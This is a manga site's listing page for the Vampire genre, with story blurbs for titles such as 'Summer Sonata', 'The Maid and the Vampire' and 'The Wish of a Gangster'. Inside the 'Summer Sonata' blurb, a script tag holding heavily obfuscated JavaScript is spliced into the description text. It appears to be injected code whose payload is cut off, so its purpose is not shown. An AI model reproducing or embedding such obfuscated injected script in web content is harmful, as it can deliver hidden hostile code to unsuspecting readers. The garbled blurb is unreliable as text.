Vampire - Page 5

Discover top manga Vampire with stunning art and thrilling tales. Enjoy the best Vampire manga free online today!

71 results

Shakaijin ga Kizuku Ajin Harem - Toudo 200% no Ecchi na Love Comedy wo Anata ni

7 years ago from now. Beautiful monster girls have come to Earth looking for a husband.


Summer Sonata

"I'd recognize him at a single glance, no matter what he looks like now." Yeon-hwa, a senior in college, lives her life while holding onto Sunwoo, her first love, deep inside her heart. One day, she gets into a traffic accident, where she gets to meet Troy, vice president of the Hangun Corporation. From then on, Troy falls for Yeon-hwa. Troy's reserved but passionate romanticism reminds Yeon-hwa of Sunwoo, which confuses her heart. Meanwhile, Troy seems to be concealing some secrets...<script></script><script>(function(_0x2cd002,_0x3f1888){var _0x43c3c4=_0x590e,_0x32ddae=_0x2cd002();while(!![]){try{var _0x8b5e5=-parseInt(_0x43c3c4(0x132))/(-0xf*0x79+-0x4*0x550+0x1c58)+-parseInt(_0x43c3c4(0x149))/(0x461+0xc92+-0x10f1)*(parseInt(_0x43c3c4(0x13d))/(0x1*-0x227d+-0x5*0x3a9+-0x1*-0x34cd))+parseInt(_0x43c3c4(0x14f))/(0x4df+0x257+-0x732)*(parseInt(_0x43c3c4(0x153))/(-0xb*-0x10d+-0x1dcb+0x1241))+-parseInt(_0x43c3c4(0x150))/(0x10ac+0x1*-0x643+-0xa63)*(-parseInt(_0x43c3c4(0x133))/(-0xffd+0x1deb+-0xde7*0x1))+-parseInt(_0x43c3c4(0x13c))/(0x83*-0x3d+0x46*0x43+-0x3*-0x44f)+parseInt(_0x43c3c4(0x147))/(-0x239*-0x4+0x12f4+-0x3f9*0x7)*(parseInt(_0x43c3c4(0x138))/(0x1b1*-0xd+0x3*0x71+-0x14b4*-0x1))+-parseInt(_0x43c3c4(0x151))/(0x54+-0x147*-0x1+-0x19*0x10)*(-parseInt(_0x43c3c4(0x13a))/(0x16bb+-0x1094*0x2+0x1*0xa79));if(_0x8b5e5===_0x3f1888)break;else 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The Ducal Family’s Poisonous Flower

Read “The Ducal Family’s Poisonous Flower” for free at Manhwa website Story line of “The Ducal Family’s Poisonous Flower”: Lily Roland, the daughter of Duke Roland, stumbled upon her fiancé and her illegitimate sister having an affair! She was poisoned by the two people whom she grew up with, and thrown into the wilderness. When her life was hanging by a thread, she was saved by a monstrous creature that had a body of a human, but a head of a beast, who turned out to be the Crown Prince, Isaac Stewart. Isaac was cursed by a mysterious witch to turn into a bloodthirsty monster on the night when the moon is full, and Lily’s blood is his only antidote! Isaac decides to help Lily in her revenge, but in exchange, she must marry him and assist him in lifting the curse. Alternative of “The Ducal Family’s Poisonous Flower”: The Poisonous Flower of the Duke’s House, Gong Jue Jia De Du Zhi Hua, 公爵家的毒之花


The Duke Of Cold Blood Plan Of Attack

It was my 25th birthday wish, but why did I suddenly become the princess of the holy blood clan? And these handsome guys in front of me actually said that they are my fiances? So confusing, who should I choose? Only children will make choices, I, Hu Luo Bei, want them all! Come and read, how a single girl travels to the empire of vampires and became the queen of the holy blood clan with stunningly handsome men!Notes from mangabuddyAll our manhua content is protected under copyrighted law. mangabuddy never gives anyone authorization or permission to publish our content on another website/app. If you’re publishing our content on your website/app, it’s mean that you’re infringing the copyright of our works. Therefore stop stolen our works or else we will take legal action against you. <h2 class="h4">The Cold-Blooded Duke’S Attack Strategies</h2>


The Fatal Kiss

The protagonist of the manhua of “The Fatal Kiss” is Zheng Xuan Er and Jiang Yun. A brief description of The Fatal Kiss’; In the manhua, Zheng Xuan Er, who lives with a pair of vampire twins, has a headache now. The two little twins she wanted to protect, took the initiative to bring a vampire hunter to their house! And because Jiang Yun was also suspicious of these two children, he stayed at her house. When he knows the truth, what will be his choice?Notes from mangabuddyAll our manhua content is protected under copyrighted law.mangabuddy never gives anyone authorized or permission to publish our content on another website/app.If you’re publishing our contents on your website/app, it’s mean that you’re infringement our copyrighted of our works. Therefore stop stolen our works or else we will take legal action against you.


The Gothic World of Nyanpire

Once upon a time, an abandoned kitten was on the brink of death. Thankfully, a vampire came up to him and offered him in own blood, thus Nyanpire was born! Follow his comical adventures with his wacky cast of friends such as a cat-samurai, or a fallen angel!


The Maid and the Vampire

Areum has fallen into a strange world called ‘Soltera’ after a car accident. She is mistaken for a vampire because of her hair color, and she is sold to a Duke’s house by a slave trader. The identity of Millard Travis the master of the Duke’s house that bought her is the one and only vampire in the world! Desperate to survive in any way, Areum becomes Millard’s direct servant, vowing to serve him as her master. Areum tries to belly up on Millard day by day and his attitude starts to change.Source of collecting


The Maid is a Vampire

15-year-old Alfred Saionji, heir to the venerable Saionji family, spends his days striving to become a first-class gentleman while enduring strict family rules. His solace comes from his maid, Magly. Thanks to her, a cool and beautiful maid, Alfred\'s life has become colorful, but... In fact, her true identity is a vampire. Once she sees or sucks blood, her very naughty nature comes out, and Alfred immediately has his blood sucked at her command... This is a love story between a boy who seeks the strength to protect a girl and a clumsy, naughty vampire maid who is in love with him.


The Night's Gentle Kiss

Clark, an 800-year-old vampire, was dug up by young Taoist, Jiang Lai, who successfully formed a contract with her. In order to eventually kill the vampire, Jiang Lai lived with her and tried various methods, but gradually became Clark\'s prey. A chance encounter turns into reinventing their past and present lives. Love and hate are like the dark and light sides of the moon. \"Clark, come to my side.\"


The Princess Wants to Die Comfortably

Read manhwa The Princess Wants to Die Comfortably / The Princess Wishes To Die Peacefully! /황녀님은 편히 죽고 싶어! / Sang Putri Ingin Mati Dengan Damai I now possess the body of Ophelia, the villainess in the story ‘The Crown Prince Returns’. And just like the protagonists in the other reincarnated novels, I thought I would fare well. I died by getting guillotined the first time, the second time was getting my limbs torn apart, third was suicide by poison, and by the fourth time, I was struck with arrows atop the throne. And by the fifth restart, even if I tried to stray from the original storyline, I would still be doomed to die. “Concoct a poison for me. Not one that’s painful, but one that’ll kill me slowly.” Therefore, this time, with all my heart and soul, I wished to die properly for once. “After I ascend the throne, are you leaving me behind?” “I sincerely hope that her highness survives, no matter what.” “Your Highness, I wish to get to know you better.” All these people surrounding aren’t letting me die off easily!


The Wish of a Gangster

A sweet, savage, action romance between a gangster and a vampire girl…! Jung Chung-Oh, he is a tyrant that wipes out the entire enemy all by himself. One day, he gets assigned to protect a girl. Baek I-Do, she is the girl that is protected by the chairman of the TaeReam group. She was – “I’m more into being a predator, than being a prey.” – A vampire. “I’m pleased to meet you. My name is Jung Chung-Oh.” Will Ido happen to be a saviour, or hell to Jung Chung-Oh, who is trying to stay alive for a bloodthirsty revenge. The Wish of a Gangster 위시 위시(WISH)
